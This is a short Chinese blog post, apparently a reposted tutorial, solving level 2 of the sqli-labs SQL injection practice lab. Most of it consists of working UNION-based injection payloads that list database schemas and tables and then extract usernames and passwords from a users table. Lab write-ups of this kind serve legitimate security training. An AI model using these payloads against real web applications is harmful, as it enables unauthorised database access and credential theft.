查询列名
?id = 0 union select 1 ,( select group_concat(schema_name) from information_schema.schemata),( select group_concat(table_name) from information_schema.tables where table_schema = ‘ security ‘ ) -- +
查询账号密码
?id = 0 union select 1 ,( select group_concat(username) from users),( select group_concat(password) from users) -- +
这里因为跟第一关大同小异,字段类型都是一样的,可以直接用exp去爆
exp: ?id=-1 union SELECT 1,2,(select group_concat(username,0x3a,password) from users)--+
这里解释一下0x3a的用途:把账号和密码整合到一起更直观的显示
sqli-labs系列——第二关
标签:name weight color order tables 直接 -- format inf
查看更多关于sqli-labs系列——第二关的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did117600